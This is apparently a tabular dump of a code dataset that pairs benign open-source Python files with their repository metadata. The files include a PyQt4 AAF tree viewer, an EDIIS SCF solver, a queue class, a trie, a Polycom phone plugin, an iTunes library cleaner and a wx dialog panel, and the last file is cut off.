code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
import sys
from PyQt4 import QtCore
import pyaaf
class DummyItem(object):
    """Lightweight stand-in node that groups a payload under a display name.

    The tree model uses these to label collections (e.g. "MasterMobs")
    that have no AAF object of their own.
    """

    def __init__(self, item, name):
        self.item = item
        self.name = name

    def GetName(self):
        """Return the display name supplied at construction."""
        return self.name

    def GetClassName(self):
        """Dummy grouping nodes expose no class name of their own."""
        return ""
class TreeItem(object):
    # One node of the lazily-built AAF object tree.  Wraps a pyaaf object,
    # a plain list, or a DummyItem grouping; children and the display
    # `properties` dict are only computed on first access via setup().
    # NOTE: Python 2 module (print statement in name() below).

    def __init__(self, item, parent=None):
        self.parentItem = parent
        self.item = item
        self.childItems = []
        self.properties = {}
        self.loaded = False  # flipped by setup() once children are resolved
        #self.getData()

    def columnCount(self):
        # The tree data itself is single-column; extra columns come from
        # the model's property lookup.
        return 1

    def childCount(self):
        self.setup()
        return len(self.childItems)

    def child(self, row):
        self.setup()
        return self.childItems[row]

    def childNumber(self):
        # Index of this node within its parent's children (0 for the root).
        self.setup()
        if self.parentItem != None:
            return self.parentItem.childItems.index(self)
        return 0

    def parent(self):
        self.setup()
        return self.parentItem

    def extendChildItems(self, items):
        # Wrap raw pyaaf objects in TreeItems parented to this node.
        self.childItems.extend([TreeItem(i, self) for i in items])

    def name(self):
        # Best-effort display name: resolved mob name for source clips,
        # operation-def name for operation groups, GetName() when present,
        # otherwise fall back to the class name.
        item = self.item
        if isinstance(item, pyaaf.AxSourceClip):
            try:
                ref = item.ResolveRef()
                return ref.GetName()
            except:
                # Unresolvable reference -- degrade to the class name.
                return self.className()
        elif isinstance(item, pyaaf.AxOperationGroup):
            return item.GetOperationDef().GetName()
        elif hasattr(item, "GetName"):
            try:
                return item.GetName() or self.className()
            except:
                print "cannot GetName of %s" % str(item)
                return self.className()
        else:
            return self.className()

    def className(self):
        item = self.item
        if hasattr(item, "GetClassName"):
            return item.GetClassName()
        else:
            # Strip the pyaaf wrapper prefix, e.g. "AxMob" -> "Mob".
            return item.__class__.__name__.replace("Ax", "")

    def setup(self):
        # Populate childItems/properties once, dispatching on the wrapped
        # type.  Called lazily from every accessor so the AAF file is only
        # traversed as the user expands the tree.
        if self.loaded:
            return
        item = self.item
        if isinstance(item, list):
            self.extendChildItems(item)
        elif isinstance(item, pyaaf.AxFile):
            self.extendChildItems([item.GetHeader()])
        elif isinstance(item, pyaaf.AxHeader):
            self.extendChildItems([item.GetContentStorage()])
            self.extendChildItems([item.GetDictionary()])
        elif isinstance(item, DummyItem):
            self.extendChildItems(item.item)
        elif isinstance(item, pyaaf.AxContentStorage):
            # Group the three mob kinds under labelled dummy nodes.
            l = []
            l.append(DummyItem(list(item.GetCompositionMobs()), "CompositionMobs"))
            l.append(DummyItem(list(item.GetMasterMobs()), "MasterMobs"))
            l.append(DummyItem(list(item.GetSourceMobs()), "SourceMobs"))
            self.extendChildItems(l)
        elif isinstance(item, pyaaf.AxDictionary):
            # One labelled dummy node per definition category.
            l = []
            l.append(DummyItem(list(item.GetClassDefs()), 'ClassDefs'))
            l.append(DummyItem(list(item.GetCodecDefs()), 'CodecDefs'))
            l.append(DummyItem(list(item.GetContainerDefs()), 'ContainerDefs'))
            l.append(DummyItem(list(item.GetDataDefs()), 'DataDefs'))
            l.append(DummyItem(list(item.GetInterpolationDefs()), 'InterpolationDefs'))
            l.append(DummyItem(list(item.GetKLVDataDefs()), 'KLVDataDefs'))
            l.append(DummyItem(list(item.GetOperationDefs()), 'OperationDefs'))
            l.append(DummyItem(list(item.GetParameterDefs()), 'ParameterDefs'))
            l.append(DummyItem(list(item.GetPluginDefs()), 'PluginDefs'))
            l.append(DummyItem(list(item.GetTaggedValueDefs()), 'TaggedValueDefs'))
            l.append(DummyItem(list(item.GetTypeDefs()), 'TypeDefs'))
            self.extendChildItems(l)
        elif isinstance(item, (pyaaf.AxDefObject, pyaaf.AxMetaDefinition)):
            # Definitions are leaves.
            pass
        elif isinstance(item, pyaaf.AxMob):
            self.extendChildItems(list(item.GetSlots()))
        elif isinstance(item, pyaaf.AxMobSlot):
            self.extendChildItems([item.GetSegment()])
        elif isinstance(item, pyaaf.AxNestedScope):
            self.extendChildItems(list(item.GetSegments()))
        elif isinstance(item, pyaaf.AxSequence):
            self.extendChildItems(list(item.GetComponents()))
        elif isinstance(item, pyaaf.AxSourceClip):
            pass
            #self.extendChildItems([item.ResolveRef().GetName()])
            #self.extendChildItems([item.GetSourceID()])
        elif isinstance(item, pyaaf.AxTransition):
            self.extendChildItems([item.GetOperationGroup()])
        elif isinstance(item, pyaaf.AxOperationGroup):
            input_segments = []
            for i in xrange(item.CountSourceSegments()):
                segment = item.GetInputSegmentAt(i)
                input_segments.append(segment)
            self.extendChildItems(input_segments)
        elif isinstance(item, pyaaf.AxSelector):
            self.extendChildItems(list(item.EnumAlternateSegments()))
        elif isinstance(item, pyaaf.AxScopeReference):
            #print item, item.GetRelativeScope(),item.GetRelativeSlot()
            pass
        elif isinstance(item, pyaaf.AxEssenceGroup):
            segments = []
            for i in xrange(item.CountChoices()):
                choice = item.GetChoiceAt(i)
                segments.append(choice)
            self.extendChildItems(segments)
        elif isinstance(item, pyaaf.AxProperty):
            self.properties['Value'] = str(item.GetValue())
        elif isinstance(item, pyaaf.AxComponent):
            pass
        else:
            # Unknown type: record repr only.  NOTE(review): this branch
            # returns before setting self.loaded, so setup() re-runs on
            # every access for such items -- confirm whether intended.
            self.properties['Name'] = str(item)
            self.properties['ClassName'] = str(type(item))
            return
        self.properties['Name'] = self.name()
        self.properties['ClassName'] = self.className()
        if isinstance(item, pyaaf.AxComponent):
            try:
                self.properties['Length'] = item.GetLength()
            except:
                # Components without a length are simply shown without one.
                pass
                #print item
        self.loaded = True
class AAFModel(QtCore.QAbstractItemModel):
    # Read-only Qt item model over the lazy TreeItem tree.  Column values
    # are looked up in each item's `properties` dict by header name.

    def __init__(self, moblist, parent=None):
        super(AAFModel, self).__init__(parent)
        self.rootItem = TreeItem(moblist)
        # Column order; keys into TreeItem.properties.
        self.headers = ['Name', 'Length', 'ClassName']

    def headerData(self, column, orientation, role):
        if orientation == QtCore.Qt.Horizontal and role == QtCore.Qt.DisplayRole:
            return QtCore.QVariant(self.headers[column])
        return QtCore.QVariant()

    def columnCount(self, index):
        #item = self.getItem(index)
        return len(self.headers)

    def rowCount(self, parent=QtCore.QModelIndex()):
        parentItem = self.getItem(parent)
        return parentItem.childCount()

    def data(self, index, role):
        # NOTE(review): invalid indexes return 0 here while non-display
        # roles return None -- Qt treats both as "no data", but confirm.
        if not index.isValid():
            return 0
        if role != QtCore.Qt.DisplayRole:
            return None
        item = self.getItem(index)
        header_key = self.headers[index.column()]
        # Missing properties render as an empty cell.
        return str(item.properties.get(header_key, ''))

    def parent(self, index):
        if not index.isValid():
            return QtCore.QModelIndex()
        childItem = self.getItem(index)
        parentItem = childItem.parent()
        if parentItem == self.rootItem:
            return QtCore.QModelIndex()
        return self.createIndex(parentItem.childNumber(), 0, parentItem)

    def index(self, row, column, parent=QtCore.QModelIndex()):
        # Only column 0 of a parent can have children.
        if parent.isValid() and parent.column() != 0:
            return QtCore.QModelIndex()
        item = self.getItem(parent)
        childItem = item.child(row)
        if childItem:
            return self.createIndex(row, column, childItem)
        else:
            return QtCore.QModelIndex()

    def getItem(self, index):
        # Map a QModelIndex to its TreeItem; invalid indexes map to the root.
        if index.isValid():
            item = index.internalPointer()
            if item:
                return item
        return self.rootItem
if __name__ == "__main__":
    # CLI entry point: open an AAF file and browse it in a QTreeView.
    from PyQt4 import QtGui
    from optparse import OptionParser

    # Options select which part of the AAF file becomes the tree root.
    parser = OptionParser()
    parser.add_option('-c', '--compmobs', action="store_true", default=False)
    parser.add_option('-m', '--mastermobs', action="store_true", default=False)
    parser.add_option('-s', '--sourcemobs', action="store_true", default=False)
    parser.add_option('-d', '--dictionary', action="store_true", default=False)
    parser.add_option('-a', '--all', action="store_true", default=False)
    (options, args) = parser.parse_args()
    if not args:
        parser.error("not enough arguments")
    file_path = args[0]

    # Keep the file open for the whole GUI session: the tree resolves
    # AAF objects lazily while the user browses.
    with pyaaf.open(file_path) as axfile:
        #root = axfile
        header = axfile.GetHeader()
        storage = header.GetContentStorage()
        root = storage
        # When several options are given, the later one wins.
        if options.compmobs:
            root = list(storage.GetCompositionMobs())
        if options.mastermobs:
            root = list(storage.GetMasterMobs())
        if options.sourcemobs:
            root = list(storage.GetSourceMobs())
        if options.dictionary:
            root = header.GetDictionary()
        if options.all:
            root = axfile
        #print mobs
        app = QtGui.QApplication(sys.argv)
        model = AAFModel(root)
        tree = QtGui.QTreeView()
        tree.setModel(model)
        tree.resize(700, 600)
        #tree.expandToDepth(3)
        tree.resizeColumnToContents(0)
        tree.show()
        sys.exit(app.exec_())
|
markreidvfx/pyaaf_old
|
examples/qt_aafmodel.py
|
Python
|
mit
| 10,046
|
# -*- coding: utf-8 -*-
# HORTON: Helpful Open-source Research TOol for N-fermion systems.
# Copyright (C) 2011-2015 The HORTON Development Team
#
# This file is part of HORTON.
#
# HORTON is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 3
# of the License, or (at your option) any later version.
#
# HORTON is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, see <http://www.gnu.org/licenses/>
#
#--
'''Energy DIIS SCF algorithm'''
import numpy as np
from horton.log import log
from horton.exceptions import NoSCFConvergence
from horton.meanfield.scf_diis import DIISHistory, DIISSCFSolver
from horton.quadprog import QPSolver
from horton.utils import doc_inherit
__all__ = ['EDIISSCFSolver']
class EDIISSCFSolver(DIISSCFSolver):
    '''The Energy DIIS SCF solver [kudin2002]_'''

    def __init__(self, threshold=1e-6, maxiter=128, nvector=6, skip_energy=False, prune_old_states=False):
        '''
           **Optional arguments:**

           threshold
                The convergence threshold for the wavefunction

           maxiter
                The maximum number of iterations. When set to None, the SCF loop
                will go one until convergence is reached.

           nvector
                The maximum size of the DIIS history.

           skip_energy
                When set to True, the final energy is not computed. Note that some
                DIIS variants need to compute the energy anyway. for these methods
                this option is irrelevant.

           prune_old_states
                When set to True, old states are pruned from the history when their
                coefficient is zero. Pruning starts at the oldest state and stops
                as soon as a state is encountered with a non-zero coefficient. Even
                if some newer states have a zero coefficient.
        '''
        # Register the literature reference for this method.
        log.cite('kudin2002', 'the EDIIS method.')
        # All actual SCF machinery lives in the base class; we only select
        # the EDIIS-specific history implementation.
        DIISSCFSolver.__init__(self, EDIISHistory, threshold, maxiter, nvector, skip_energy, prune_old_states)
class EDIISHistory(DIISHistory):
    '''A Energy DIIS history object that keeps track of previous SCF solutions

    NOTE: Python 2 module (xrange).
    '''
    name = 'EDIIS'
    # EDIIS extrapolates over energies, so each stored state needs one.
    need_energy = True

    def __init__(self, lf, nvector, ndm, deriv_scale, overlap):
        '''
           **Arguments:**

           lf
                The LinalgFactor used to create the two-index operators.

           nvector
                The maximum size of the history.

           ndm
                The number of density matrices (and fock matrices) in one
                state.

           deriv_scale
                The deriv_scale attribute of the Effective Hamiltonian

           overlap
                The overlap matrix.
        '''
        # A matrix with dot products of all density and fock matrices
        # Note that the dots matrix is not symmetric!
        # Initialised to NaN so _complete_edots_matrix can tell which
        # entries still need computing.
        self.edots = np.empty((nvector, nvector))
        self.edots.fill(np.nan)
        DIISHistory.__init__(self, lf, nvector, ndm, deriv_scale, overlap, [self.edots])

    def _complete_edots_matrix(self):
        '''Complete the matrix of dot products between density and fock matrices

           Even after multiple additions, this routine will fill up all the
           missing dot products in self.edots.
        '''
        # This routine even works after multiple additions.
        # Walk from the newest state backwards; stop at the first row that
        # is already filled (everything older is then complete too).
        for i0 in xrange(self.nused - 1, -1, -1):
            if np.isfinite(self.edots[i0, i0]):
                return
            # Compute off-diagonal coefficients
            state0 = self.stack[i0]
            for i1 in xrange(i0 + 1):
                state1 = self.stack[i1]
                # edots[i0,i1] = sum_j Tr(F_j(i0) . D_j(i1))
                self.edots[i0, i1] = 0.0
                for j in xrange(self.ndm):
                    self.edots[i0, i1] += state0.focks[j].contract_two('ab,ba', state1.dms[j])
                if i0 != i1:
                    # Note that this matrix is not symmetric!
                    self.edots[i1, i0] = 0.0
                    for j in xrange(self.ndm):
                        self.edots[i1, i0] += state1.focks[j].contract_two('ab,ba', state0.dms[j])

    def _setup_equations(self):
        '''Compute the equations for the quadratic programming problem.

           Returns the symmetric quadratic term ``b`` and the linear term
           ``e`` (negated state energies) of the EDIIS objective.
        '''
        b = np.zeros((self.nused, self.nused), float)
        e = np.zeros(self.nused, float)
        for i0 in xrange(self.nused):
            e[i0] = -self.stack[i0].energy
            for i1 in xrange(i0 + 1):
                # Symmetrised combination of the (non-symmetric) edots.
                b[i0, i1] = -0.5 * self.deriv_scale * (self.edots[i0, i0] + self.edots[i1, i1] - self.edots[i0, i1] - self.edots[i1, i0])
                if i0 != i1:
                    b[i1, i0] = b[i0, i1]
        return b, e

    @doc_inherit(DIISHistory)
    def solve(self, dms_output, focks_output):
        # interpolation only makes sense if there are two points
        assert self.nused >= 2
        # Fill in the missing commutators
        self._complete_edots_matrix()
        assert not np.isnan(self.edots[:self.nused, :self.nused]).any()
        # Setup the equations
        b, e = self._setup_equations()
        # Check if solving these equations makes sense.
        if b.max() - b.min() == 0 and e.max() - e.min() == 0:
            raise NoSCFConvergence('Convergence criteria too tight for EDIIS')
        # solve the quadratic programming problem: minimise over the
        # simplex (coefficients sum to 1, non-negative).
        qps = QPSolver(b, e, np.ones((1, self.nused)), np.array([1.0]), eps=1e-6)
        if self.nused < 10:
            # Small histories: exhaustive search over active sets.
            energy, coeffs = qps.find_brute()
            guess = None
        else:
            # Larger histories: local search seeded at the lowest-energy state.
            guess = np.zeros(self.nused)
            guess[e.argmax()] = 1.0
            energy, coeffs = qps.find_local(guess, 1.0)
        # for debugging purposes (negligible computational overhead)
        try:
            qps.check_solution(coeffs)
        except:
            qps.log(guess)
            raise
        cn = qps.compute_cn(coeffs != 0.0)
        # assign extrapolated fock
        error = self._build_combinations(coeffs, dms_output, focks_output)
        return energy, coeffs, cn, 'E', error
|
eustislab/horton
|
horton/meanfield/scf_ediis.py
|
Python
|
gpl-3.0
| 6,201
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014-2018 Harrison Feng <feng.harrison@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
class Queue(object):
    '''Queue

    A FIFO (first in, first out) collection: unlike a stack, the element
    enqueued first is the first one handed back by dequeue.

        ---> d ---> c ---> b ---> a ---->
         in                        out
    '''

    def __init__(self):
        # Front of the queue lives at index 0; new items are appended.
        self._items = []

    def is_empty(self):
        '''Determine whether the queue is empty.'''
        return len(self._items) == 0

    def enqueue(self, data):
        '''Insert an item at the back of the queue.'''
        self._items.append(data)

    def dequeue(self):
        '''Remove and return the front item, or report emptiness.'''
        if not self._items:
            print("This queue is empty")
            return None
        return self._items.pop(0)

    def size(self):
        '''Return the number of queued items.'''
        return len(self._items)

    def peek(self):
        '''Return the front item without removing it, or report emptiness.'''
        if not self._items:
            print("This queue is empty")
            return None
        return self._items[0]
|
harrisonfeng/py-algorithms
|
algorithms/py/adt/queues/queue.py
|
Python
|
apache-2.0
| 1,730
|
# -*- coding: utf-8 -*-
# Copyright (C) 2014 Avencall
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
"""Plugin for Polycom phones using the 3.2.4.0267 SIP application.
The following Polycom phones are supported:
- SPIP320
- SPIP321
- SPIP330
- SPIP331
- SPIP335
- SPIP430
- SPIP450
- SPIP550
- SPIP560
- SPIP650
- SPIP670
- SSIP5000
- SSIP6000
- SSIP7000
- VVX1500
"""
# XXX version for VVX1500 is 3.2.4.0244, not 3.2.4.0267.
# Pull the shared Polycom base classes into this module's scope.
# NOTE(review): execfile_ is supplied by the provd plugin loader --
# presumably it executes common.py with common_globals as its namespace;
# confirm against the loader.
common_globals = {}
execfile_('common.py', common_globals)

# Phone models covered by this package and the SIP application version.
MODELS = [u'SPIP320', u'SPIP321', u'SPIP330', u'SPIP331', u'SPIP335', u'SPIP430',
          u'SPIP450', u'SPIP550', u'SPIP560', u'SPIP650', u'SPIP670', u'SSIP5000',
          u'SSIP6000', u'SSIP7000', u'VVX1500']
VERSION = u'3.2.4.0267'


class PolycomPlugin(common_globals['BasePolycomPlugin']):
    # Marks this class as the plugin entry point for the loader.
    IS_PLUGIN = True
    pg_associator = common_globals['BasePolycomPgAssociator'](MODELS, VERSION)
|
alexis-via/xivo-provd-plugins
|
plugins/xivo-polycom/3.2.4B/entry.py
|
Python
|
gpl-3.0
| 1,483
|
#!/bin/env python2
"""
Support functions for multibyte mnemonic encodings of
unicode characters.
$Id$
"""
def index(str):
    """Return the branching key for *str*: its first element."""
    return str[0]
class Trie:
    '''Represents r: string ++> value

    A partial mapping from strings to values, stored as a tree with one
    single-character branch per node.  NOTE: Python 2 code (has_key,
    backtick repr).
    '''

    def __init__(self):
        '''ensures r := {}'''
        self.subtries = {}
        # Value stored at this node; None when no entry ends here.
        # NOTE(review): this instance attribute shadows the value()
        # method below, so the method looks unreachable through normal
        # attribute lookup on instances -- confirm which is intended.
        self.value = None

    def add(self, str, value=None):
        """
        r (+):= { str |-> value }

        Walks/creates one subtrie per character; the value is stored at
        the node reached after the last character.
        """
        if str:
            key = index(str)
            if not self.subtries.has_key(key): self.subtries[key] = Trie()
            self.subtries[key].add(str[1:], value)
        else:
            self.value = value

    def value(self, str):
        """
        returns r[str]

        NOTE(review): shadowed by the self.value attribute (see __init__).
        """
        if str:
            key = index(str)
            if not self.subtries.has_key(key): return None
            return self.subtries[key].value(str[1:])
        else:
            return self.value

    def printOn(self, stream, ind=0):
        """
        Print a multiline representation of the mapping
        """
        # One line per node: indentation bars show depth, then the key
        # and, when present, "= value".
        for k in self.subtries.keys():
            stream.write("%s%s" % (ind*'| ', `k`))
            subtree = self.subtries[k]
            if subtree.value:
                stream.write(" = %s" % (`subtree.value`))
            stream.write("\n")
            subtree.printOn(stream, ind+1)

    def __repr__(self):
        # Parenthesised depth-first dump of keys and stored values.
        if self.subtries:
            buf = " ("
            for k in self.subtries.keys():
                buf += `k`
                subtree = self.subtries[k]
                if subtree.value: buf += (" "+`subtree.value`)
                subtrierep = self.subtries[k].__repr__()
                buf += subtrierep
                if subtrierep and subtrierep[-1] == ')': buf += " "
            return buf + ")"
        else:
            return ""

    def __str__(self): return self.__repr__()
class Cursor:
    """
    Represents the state of an automaton that is ``desugaring'' an input
    stream by replacing occurrences of domain elements of a trie by the
    corresponding range elements.  Ambiguities are resolved by
    translating the maximal left substring found in the domain.
    NOTE: Python 2 code (has_key).
    """

    def __init__(self, trie):
        self.start = trie  # original trie
        self.node = trie   # current location
        self.value = None  # last value
        self.buf = ""      # characters read since last output

    def move(self, ch):
        """
        Consume a character:
        Returns:
           None,        nothing to output
           (None, buf)  buf to output -- consumed no sugar since last output
           (val, buf)   buf to output -- consumed sugar for val since last output
        """
        key = ch
        # Record the value at the current node so that a failed longer
        # match can still fall back to it (maximal-munch behaviour).
        if self.node.value:
            self.value = self.node.value
            self.buf = ""
        if self.node.subtries.has_key(key):
            # The match can be extended; keep consuming silently.
            self.node = self.node.subtries[key]
            self.buf += ch
            return None
        elif self.value:
            # Dead end after a recorded match: emit it plus trailing chars
            # and restart from the trie root.
            val = self.value
            buf = self.buf + ch
            self.value = None
            self.buf = ""
            self.node = self.start
            return (val, buf)
        else:
            # Dead end with no match: pass the buffered characters through.
            buf = self.buf + ch
            self.buf = ""
            self.node = self.start
            return (None, buf)
if __name__ == '__main__':
    # Interactive smoke test: build a small trie with overlapping
    # prefixes, dump it, then desugar stdin line by line, wrapping each
    # recognised token's translation in {...}.  Python 2 (print statement).
    import sys
    err = 0
    t = Trie()
    t.add('->', r"""\arrow""")
    t.add('+>', r"""\pfun""")
    t.add('>=', r"""\geq""")
    t.add('->>', r"""\surjection""")
    t.add('+>>', r"""\partialsurjection""")
    t.add('++>', r"""\fmap""")
    t.add('++', r"""\cat""")
    t.add('foo', r"""\fu""")
    t.add('bar', r"""\bar""")
    t.add('fooobar', r"""\fubar""")
    t.printOn(sys.stderr)
    print t
    c = Cursor(t)
    sys.stdout.write(":: ")
    sys.stdout.flush()
    line = sys.stdin.readline()
    while line:
        buf = ""
        for ch in line:
            v = c.move(ch)
            if v:
                r, k = v
                # r is the translation (if any), k the raw characters.
                if r: buf += "{" + r + "}"
                buf += k
        sys.stdout.write(buf)
        sys.stdout.flush()
        sys.stdout.write(":: ")
        sys.stdout.flush()
        line = sys.stdin.readline()
|
RBornat/jape
|
dev/Unicode/trie.py
|
Python
|
gpl-2.0
| 4,401
|
# app.py or app/__init__.py
from flask import Flask

# instance_relative_config makes from_pyfile below resolve paths relative
# to the instance/ folder instead of the package root.
app = Flask(__name__, instance_relative_config=True)

# Load the default configuration
app.config.from_object('config.default')

# Load the configuration from the instance folder
# NOTE(review): raises if instance/config.py is missing -- pass
# silent=True if that file is meant to be optional.
app.config.from_pyfile('config.py')

# Load the file specified by the APP_CONFIG_FILE environment variable
# Variables defined here will override those in the default configuration
# NOTE(review): from_envvar raises RuntimeError when the variable is not
# set -- confirm this is intended for all deployments.
app.config.from_envvar('APP_CONFIG_FILE')

# Now we can access the configuration variables via app.config["VAR_NAME"].
|
noll-scpls/hybrid
|
__init__.py
|
Python
|
gpl-3.0
| 533
|
import logging
import urllib
from os.path import isfile

import numpy as np
import pandas as pd
from tqdm import tqdm
from blessings import Terminal

from organiser import tm_utils

# Shared terminal-colouring helper and module-level logger.
TERM = Terminal()
log = logging.getLogger(__name__)
def extract_record(record, fields):
    """Pull *fields* out of *record* into a new dict.

    Fields absent from the record map to np.nan so downstream pandas
    code sees a consistent set of columns.
    """
    return {field: record.get(field, np.nan) for field in fields}
# TODO: Add a __str__ method
class ITunesSongs(object):
    """Wraps an iTunes library song dict, cleans it, and builds a pandas
    DataFrame (self.df) keyed by iTunes Track ID."""

    def __init__(self, song_list):
        # What fields do we want to extract
        self.extract_fields = (
            "Track ID",  # the Database ID, also represented by the "key"
            "Genre",
            "Year",
            "Album",
            "Grouping",
            "Comments",
            "Release Date",
            "BPM",
            "Composer",
            "Total Time",
            "Start Time",
            "Stop Time",
        )
        # Copy so cleaning does not mutate the caller's dict.
        self.songs = song_list.copy()
        self.keys = [int(key) for key in self.songs.keys()]
        self.df = None  # Where we will hold the pandas dataframe with the songs
        self._clean_songs()
        self._get_dataframe()

    def __iter__(self):
        return self._iter_songs()

    @staticmethod
    def get_fname(record):
        """Print the location of an iTunes record:
        fname = iTunes.get_fname(record)
        """
        # Location is a file:// URL; strip the scheme and URL-decode it.
        fname = record.get("Location") or ""
        fname = fname.replace("file://", "")
        fname = urllib.parse.unquote(fname)
        return fname

    def _get_dataframe(self):
        # Build one row per song with derived columns, then convert to a
        # DataFrame (transposed so keys become the index).
        song_dict = dict()
        for key, record in self:
            filename = self.get_fname(record)
            # "Artist" is assumed formatted as "Director - Singers";
            # reversed so pop() yields the director first.
            artist = record["Artist"].split(" - ") if "Artist" in record else [""]
            artist.reverse()
            # Run unidecode, remove punctuation, double spaces and lower on the titles
            if "Name" in record:
                title = record["Name"]
                title_clean = tm_utils.clean_string(record["Name"])
            else:
                title = np.nan
                title_clean = np.nan
            # Rating (ignore computed ratings)
            rating = record["Rating"] if "Rating" in record else 0
            if "Rating Computed" in record and record["Rating Computed"] is True:
                rating = 0
            # Records without a duration are skipped entirely.
            if "Total Time" in record:
                record_dict = {
                    "Filename": filename,
                    "Title": title,
                    "Title Clean": title_clean,
                    "Director": artist.pop(),
                    "Singers": "" if not artist else artist.pop(),
                    "Rating": rating,
                    # Loved/Disliked collapse to a single -1/0/+1 column.
                    "Loved": 1
                    if record.get("Loved")
                    else -1
                    if record.get("Disliked")
                    else 0,
                }
                record_dict.update(extract_record(record, self.extract_fields))
                song_dict[key] = record_dict
        # Convert set of dictionaries to dataframe and save
        self.df = pd.DataFrame(song_dict).T

    def _iter_songs(self):
        # Iterate over a snapshot of keys (safe while _clean_songs deletes).
        for key in tqdm(self.keys):
            record = self.songs[str(key)]
            yield key, record

    def _clean_songs(self):
        # Drop podcasts, audiobooks, voice memos, missing files and
        # unsupported formats, then refresh the key snapshot.
        log.info(TERM.green("Cleaning iTunes"))
        for key, record in self._iter_songs():
            fname = self.get_fname(record)
            if "Podcast" in record or "Audiobook" in record:
                del self.songs[str(key)]
            elif "Genre" in record and record["Genre"] in ["Voice", "Voice Memo"]:
                del self.songs[str(key)]
            elif not isfile(fname):
                del self.songs[str(key)]
            elif fname.lower().endswith((".ipa", ".aif", ".aiff", ".wav")):
                del self.songs[str(key)]
        self.keys = [int(key) for key in self.songs.keys()]
|
alexvicegrab/tango_master
|
itunes/itunes_songs.py
|
Python
|
gpl-3.0
| 3,869
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2016, 2017, 2018 Guenter Bartsch
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
DEPENDS = [ 'base', 'dialog' ]
import sports
def get_data(k):
    """Delegate data loading for this skill to the bundled sports module.

    Parameters:
        k: the kernel/skill context object handed through to
           sports.get_data().
    """
    # Propagate the delegate's result; the original dropped it, which
    # silently discarded any return value the delegate produces.
    return sports.get_data(k)
|
gooofy/voxforge
|
zamiaai/skills/sports/__init__.py
|
Python
|
lgpl-3.0
| 735
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
from cairis.core.Borg import Borg
__author__ = 'Shamal Faily'
class ExceptionPanel(wx.Panel):
    """wx panel for editing a step exception: name, goal/requirement
    type, value, category and definition.  Uses the classic (pre-Phoenix)
    wxPython API."""

    def __init__(self, parent, envName):
        wx.Panel.__init__(self, parent, EXCEPTION_ID)
        b = Borg()
        self.dbProxy = b.dbProxy
        self.theEnvironmentName = envName
        mainSizer = wx.BoxSizer(wx.VERTICAL)
        mainSizer.Add(WidgetFactory.buildTextSizer(self, 'Name', (87, 30), EXCEPTION_TEXTNAME_ID), 0, wx.EXPAND)
        # Radio pair toggles whether the Values combo lists goals or requirements.
        mainSizer.Add(WidgetFactory.buildRadioButtonSizer(self, 'Type', (87, 30), [(EXCEPTION_RADIOGOAL_ID, 'Goal'), (EXCEPTION_RADIOREQUIREMENT_ID, 'Requirement')]))
        goalList = self.dbProxy.environmentGoals(self.theEnvironmentName)
        mainSizer.Add(WidgetFactory.buildComboSizerList(self, 'Values', (87, 30), EXCEPTION_COMBOGOALS_ID, goalList), 0, wx.EXPAND)
        catList = ['Confidentiality Threat', 'Integrity Threat', 'Availability Threat', 'Accountability Threat', 'Anonymity Threat', 'Pseudonymity Threat', 'Unlinkability Threat', 'Unobservability Threat', 'Vulnerability', 'Duration', 'Frequency', 'Demands', 'Goal Support']
        mainSizer.Add(WidgetFactory.buildComboSizerList(self, 'Category', (87, 30), EXCEPTION_COMBOCATEGORY_ID, catList), 0, wx.EXPAND)
        mainSizer.Add(WidgetFactory.buildMLTextSizer(self, 'Definition', (87, 30), EXCEPTION_TEXTDEFINITION_ID), 1, wx.EXPAND)
        self.SetSizer(mainSizer)
        wx.EVT_RADIOBUTTON(self, EXCEPTION_RADIOGOAL_ID, self.onGoalSelected)
        wx.EVT_RADIOBUTTON(self, EXCEPTION_RADIOREQUIREMENT_ID, self.onRequirementSelected)

    def onGoalSelected(self, evt):
        # Repopulate the Values combo with the environment's goals.
        goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
        goals = self.dbProxy.environmentGoals(self.theEnvironmentName)
        goalCtrl.SetItems(goals)
        goalCtrl.SetValue('')

    def onRequirementSelected(self, evt):
        # Repopulate the Values combo with requirement names.
        goalCtrl = self.FindWindowById(EXCEPTION_COMBOGOALS_ID)
        goals = self.dbProxy.getDimensionNames('requirement')
